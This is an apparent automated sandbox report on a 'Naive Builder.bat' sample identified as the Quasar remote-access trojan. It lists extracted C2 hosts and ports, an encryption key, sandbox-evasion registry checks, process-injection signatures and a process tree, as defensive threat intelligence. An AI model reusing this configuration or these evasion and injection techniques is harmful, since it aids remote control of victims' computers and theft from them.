Analysis
-
max time kernel
150s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
04-12-2024 09:39
Static task
static1
Behavioral task
behavioral1
Sample
naive-stealer-main/Naive Builder.bat
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
naive-stealer-main/Naive Builder.bat
Resource
win10v2004-20241007-en
General
-
Target
naive-stealer-main/Naive Builder.bat
-
Size
12.8MB
-
MD5
a2e3e4286e8b22b3b021a6706b899dd7
-
SHA1
e6179204735421c3927f27c13f9751af1dce9bd2
-
SHA256
efd80dd8487437f58413be6e7d2da6ea866ae7626b3225dbf326e8c82c85e580
-
SHA512
3ff5d19accd1fa6765ffc3554bb9cfe3989eee4cf226c2ce7abbaff47a1586253ab1b408f4f9e47611ea7d2415f3298b12dfada1d1987d43c2efa16aac11e3e8
-
SSDEEP
49152:JZHKpAhg6/Ri76PuM0gcqQP+GBRa1SgA+754EU1kOeTUliFDvnrNqjdsusoj8nNc:e
Malware Config
Extracted
quasar
1.0.0.0
v15.6.3 | xen
studies-royal.at.ply.gg:31849
usa-departments.at.ply.gg:37274
category-in.at.ply.gg:42204
bd62476d-8a2b-4e05-a8e5-68cc94baac4f
-
encryption_key
AA41DD5506DCFCA6EE3BF934CC3C9319F80E5E10
-
install_name
.exe
-
log_directory
$sxr-Logs
-
reconnect_delay
5000
-
startup_key
$sxr-seroxen
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/820-60-0x0000023A7DBF0000-0x0000023A7E3AC000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
Processes:
Naive Builder.bat.exe$sxr-powershell.exedescription pid Process procid_target PID 1748 created 616 1748 Naive Builder.bat.exe 5 PID 820 created 616 820 $sxr-powershell.exe 5 PID 820 created 616 820 $sxr-powershell.exe 5 PID 1748 created 616 1748 Naive Builder.bat.exe 5 PID 1748 created 616 1748 Naive Builder.bat.exe 5 -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Naive Builder.bat.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation Naive Builder.bat.exe -
Deletes itself 1 IoCs
Processes:
Naive Builder.bat.exepid Process 1748 Naive Builder.bat.exe -
Executes dropped EXE 3 IoCs
Processes:
Naive Builder.bat.exe$sxr-powershell.exe$sxr-powershell.exepid Process 1748 Naive Builder.bat.exe 820 $sxr-powershell.exe 4136 $sxr-powershell.exe -
Hide Artifacts: Hidden Window 1 TTPs 2 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
Processes:
$sxr-powershell.exe$sxr-powershell.exepid Process 820 $sxr-powershell.exe 4136 $sxr-powershell.exe -
Drops file in System32 directory 17 IoCs
Processes:
Naive Builder.bat.exesvchost.exeOfficeClickToRun.exe$sxr-powershell.exedescription ioc Process File created C:\Windows\System32\vcruntime140d.dll Naive Builder.bat.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\ucrtbased.dll Naive Builder.bat.exe File opened for modification C:\Windows\System32\vcruntime140_1d.dll Naive Builder.bat.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\System32\ucrtbased.dll Naive Builder.bat.exe File created C:\Windows\System32\vcruntime140_1d.dll Naive Builder.bat.exe File opened for modification C:\Windows\System32\vcruntime140_1d.dll $sxr-powershell.exe File opened for modification C:\Windows\System32\vcruntime140d.dll $sxr-powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\System32\vcruntime140d.dll Naive Builder.bat.exe File opened for modification C:\Windows\System32\ucrtbased.dll $sxr-powershell.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
Naive Builder.bat.exe$sxr-powershell.exedescription pid Process procid_target PID 1748 set thread context of 5012 1748 Naive Builder.bat.exe 91 PID 820 set thread context of 632 820 $sxr-powershell.exe 95 PID 820 set thread context of 1772 820 $sxr-powershell.exe 97 PID 1748 set thread context of 220 1748 Naive Builder.bat.exe 100 PID 1748 set thread context of 1084 1748 Naive Builder.bat.exe 101 -
Drops file in Windows directory 6 IoCs
Processes:
Naive Builder.bat.execmd.exedescription ioc Process File created C:\Windows\$sxr-mshta.exe Naive Builder.bat.exe File opened for modification C:\Windows\$sxr-mshta.exe Naive Builder.bat.exe File created C:\Windows\$sxr-seroxen2\$sxr-Uni.bat cmd.exe File opened for modification C:\Windows\$sxr-seroxen2\$sxr-Uni.bat cmd.exe File created C:\Windows\$sxr-powershell.exe Naive Builder.bat.exe File opened for modification C:\Windows\$sxr-powershell.exe Naive Builder.bat.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid Process 2444 cmd.exe 4692 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
wmiprvse.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid Process 3240 taskkill.exe -
Modifies data under HKEY_USERS 14 IoCs
Processes:
OfficeClickToRun.exesvchost.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1733305293" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 04 Dec 2024 09:41:35 GMT" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={27D6FD15-D07D-4FBB-BD69-05A5882CAEDD}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Naive Builder.bat.exedllhost.exe$sxr-powershell.exedllhost.exe$sxr-powershell.exedllhost.exepid Process 1748 Naive Builder.bat.exe 1748 Naive Builder.bat.exe 1748 Naive Builder.bat.exe 5012 dllhost.exe 5012 dllhost.exe 5012 dllhost.exe 5012 dllhost.exe 1748 Naive Builder.bat.exe 1748 Naive Builder.bat.exe 820 $sxr-powershell.exe 820 $sxr-powershell.exe 820 $sxr-powershell.exe 820 $sxr-powershell.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 820 $sxr-powershell.exe 820 $sxr-powershell.exe 4136 $sxr-powershell.exe 4136 $sxr-powershell.exe 820 $sxr-powershell.exe 1772 dllhost.exe 1772 dllhost.exe 4136 $sxr-powershell.exe 4136 $sxr-powershell.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe 1772 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Naive Builder.bat.exedllhost.exe$sxr-powershell.exedllhost.exe$sxr-powershell.exedllhost.exesvchost.exesvchost.exedescription pid Process Token: SeDebugPrivilege 1748 Naive Builder.bat.exe Token: SeDebugPrivilege 1748 Naive Builder.bat.exe Token: SeDebugPrivilege 5012 dllhost.exe Token: SeDebugPrivilege 820 $sxr-powershell.exe Token: SeDebugPrivilege 820 $sxr-powershell.exe Token: SeDebugPrivilege 632 dllhost.exe Token: SeDebugPrivilege 4136 $sxr-powershell.exe Token: SeDebugPrivilege 820 $sxr-powershell.exe Token: SeDebugPrivilege 1772 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2056 svchost.exe Token: SeIncreaseQuotaPrivilege 2056 svchost.exe Token: SeSecurityPrivilege 2056 svchost.exe Token: SeTakeOwnershipPrivilege 2056 svchost.exe Token: SeLoadDriverPrivilege 2056 svchost.exe Token: SeSystemtimePrivilege 2056 svchost.exe Token: SeBackupPrivilege 2056 svchost.exe Token: SeRestorePrivilege 2056 svchost.exe Token: SeShutdownPrivilege 2056 svchost.exe Token: SeSystemEnvironmentPrivilege 2056 svchost.exe Token: SeUndockPrivilege 2056 svchost.exe Token: SeManageVolumePrivilege 2056 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2056 svchost.exe Token: SeIncreaseQuotaPrivilege 2056 svchost.exe Token: SeSecurityPrivilege 2056 svchost.exe Token: SeTakeOwnershipPrivilege 2056 svchost.exe Token: SeLoadDriverPrivilege 2056 svchost.exe Token: SeSystemtimePrivilege 2056 svchost.exe Token: SeBackupPrivilege 2056 svchost.exe Token: SeRestorePrivilege 2056 svchost.exe Token: SeShutdownPrivilege 2056 svchost.exe Token: SeSystemEnvironmentPrivilege 2056 svchost.exe Token: SeUndockPrivilege 2056 svchost.exe Token: SeManageVolumePrivilege 2056 svchost.exe Token: SeAuditPrivilege 2760 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2056 svchost.exe Token: SeIncreaseQuotaPrivilege 2056 svchost.exe Token: SeSecurityPrivilege 2056 svchost.exe Token: SeTakeOwnershipPrivilege 2056 svchost.exe Token: SeLoadDriverPrivilege 2056 svchost.exe Token: SeSystemtimePrivilege 2056 svchost.exe Token: SeBackupPrivilege 2056 svchost.exe Token: SeRestorePrivilege 2056 svchost.exe Token: SeShutdownPrivilege 2056 svchost.exe Token: SeSystemEnvironmentPrivilege 2056 svchost.exe Token: SeUndockPrivilege 2056 svchost.exe Token: SeManageVolumePrivilege 2056 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2056 svchost.exe Token: SeIncreaseQuotaPrivilege 2056 svchost.exe Token: SeSecurityPrivilege 2056 svchost.exe Token: SeTakeOwnershipPrivilege 2056 svchost.exe Token: SeLoadDriverPrivilege 2056 svchost.exe Token: SeSystemtimePrivilege 2056 svchost.exe Token: SeBackupPrivilege 2056 svchost.exe Token: SeRestorePrivilege 2056 svchost.exe Token: SeShutdownPrivilege 2056 svchost.exe Token: SeSystemEnvironmentPrivilege 2056 svchost.exe Token: SeUndockPrivilege 2056 svchost.exe Token: SeManageVolumePrivilege 2056 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2056 svchost.exe Token: SeIncreaseQuotaPrivilege 2056 svchost.exe Token: SeSecurityPrivilege 2056 svchost.exe Token: SeTakeOwnershipPrivilege 2056 svchost.exe Token: SeLoadDriverPrivilege 2056 svchost.exe Token: SeSystemtimePrivilege 2056 svchost.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
$sxr-powershell.exeConhost.exepid Process 820 $sxr-powershell.exe 3484 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exenet.exeNaive Builder.bat.exe$sxr-powershell.exedllhost.exedescription pid Process procid_target PID 1484 wrote to memory of 5008 1484 cmd.exe 83 PID 1484 wrote to memory of 5008 1484 cmd.exe 83 PID 5008 wrote to memory of 5096 5008 net.exe 84 PID 5008 wrote to memory of 5096 5008 net.exe 84 PID 1484 wrote to memory of 1748 1484 cmd.exe 85 PID 1484 wrote to memory of 1748 1484 cmd.exe 85 PID 1748 wrote to memory of 5012 1748 Naive Builder.bat.exe 91 PID 1748 wrote to memory of 5012 1748 Naive Builder.bat.exe 91 PID 1748 wrote to memory of 5012 1748 Naive Builder.bat.exe 91 PID 1748 wrote to memory of 5012 1748 Naive Builder.bat.exe 91 PID 1748 wrote to memory of 5012 1748 Naive Builder.bat.exe 91 PID 1748 wrote to memory of 5012 1748 Naive Builder.bat.exe 91 PID 1748 wrote to memory of 5012 1748 Naive Builder.bat.exe 91 PID 1748 wrote to memory of 820 1748 Naive Builder.bat.exe 94 PID 1748 wrote to memory of 820 1748 Naive Builder.bat.exe 94 PID 820 wrote to memory of 632 820 $sxr-powershell.exe 95 PID 820 wrote to memory of 632 820 $sxr-powershell.exe 95 PID 820 wrote to memory of 632 820 $sxr-powershell.exe 95 PID 820 wrote to memory of 632 820 $sxr-powershell.exe 95 PID 820 wrote to memory of 632 820 $sxr-powershell.exe 95 PID 820 wrote to memory of 632 820 $sxr-powershell.exe 95 PID 820 wrote to memory of 632 820 $sxr-powershell.exe 95 PID 820 wrote to memory of 4136 820 $sxr-powershell.exe 96 PID 820 wrote to memory of 4136 820 $sxr-powershell.exe 96 PID 820 wrote to memory of 1772 820 $sxr-powershell.exe 97 PID 820 wrote to memory of 1772 820 $sxr-powershell.exe 97 PID 820 wrote to memory of 1772 820 $sxr-powershell.exe 97 PID 820 wrote to memory of 1772 820 $sxr-powershell.exe 97 PID 820 wrote to memory of 1772 820 $sxr-powershell.exe 97 PID 820 wrote to memory of 1772 820 $sxr-powershell.exe 97 PID 820 wrote to memory of 1772 820 $sxr-powershell.exe 97 PID 820 wrote to memory of 1772 820 $sxr-powershell.exe 97 PID 820 wrote to memory of 1772 820 $sxr-powershell.exe 97 PID 1772 wrote to memory of 616 1772 dllhost.exe 5 PID 1772 wrote to memory of 676 1772 dllhost.exe 7 PID 1772 wrote to memory of 964 1772 dllhost.exe 12 PID 1772 wrote to memory of 380 1772 dllhost.exe 13 PID 1772 wrote to memory of 408 1772 dllhost.exe 14 PID 1772 wrote to memory of 64 1772 dllhost.exe 15 PID 1772 wrote to memory of 1096 1772 dllhost.exe 17 PID 1772 wrote to memory of 1124 1772 dllhost.exe 18 PID 1772 wrote to memory of 1172 1772 dllhost.exe 19 PID 1772 wrote to memory of 1224 1772 dllhost.exe 20 PID 1772 wrote to memory of 1304 1772 dllhost.exe 21 PID 1772 wrote to memory of 1320 1772 dllhost.exe 22 PID 1772 wrote to memory of 1336 1772 dllhost.exe 23 PID 1772 wrote to memory of 1400 1772 dllhost.exe 24 PID 1772 wrote to memory of 1488 1772 dllhost.exe 25 PID 1772 wrote to memory of 1592 1772 dllhost.exe 26 PID 1772 wrote to memory of 1600 1772 dllhost.exe 27 PID 1772 wrote to memory of 1660 1772 dllhost.exe 28 PID 1772 wrote to memory of 1736 1772 dllhost.exe 29 PID 1772 wrote to memory of 1756 1772 dllhost.exe 30 PID 1772 wrote to memory of 1792 1772 dllhost.exe 31 PID 1772 wrote to memory of 1888 1772 dllhost.exe 32 PID 1772 wrote to memory of 1996 1772 dllhost.exe 33 PID 1772 wrote to memory of 2008 1772 dllhost.exe 34 PID 1772 wrote to memory of 1520 1772 dllhost.exe 35 PID 1772 wrote to memory of 1668 1772 dllhost.exe 36 PID 1772 wrote to memory of 2056 1772 dllhost.exe 37 PID 1772 wrote to memory of 2116 1772 dllhost.exe 38 PID 1772 wrote to memory of 2224 1772 dllhost.exe 40 PID 1772 wrote to memory of 2352 1772 dllhost.exe 41 PID 1772 wrote to memory of 2512 1772 dllhost.exe 42 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:380
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{ae3c686e-c8a7-4fc7-8f6a-4b855571a64b}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5012
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{db6e0d38-00ac-468d-a543-5d6082745848}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:632
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{67c2b3fb-ad65-45a3-b121-e1de3f97a420}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1772
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{fb6e48e1-68d7-4424-9d35-85cdb984541f}2⤵PID:220
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{a7f58d20-342f-4a95-aeb6-4a0482330ff3}2⤵PID:1084
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:964
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:408
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:64
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1096
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1124
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1172
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2920
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1224
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1304
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1320
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1336
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1400
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1488
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2664
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1592
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1600
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1660
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1736
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1756
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1792
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1888
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1996
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2008
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1520
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2116
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2224
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2352
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2512
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2520
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2700
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2760
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2780
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2808
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2816
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3064
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2900
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3348
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3448
-
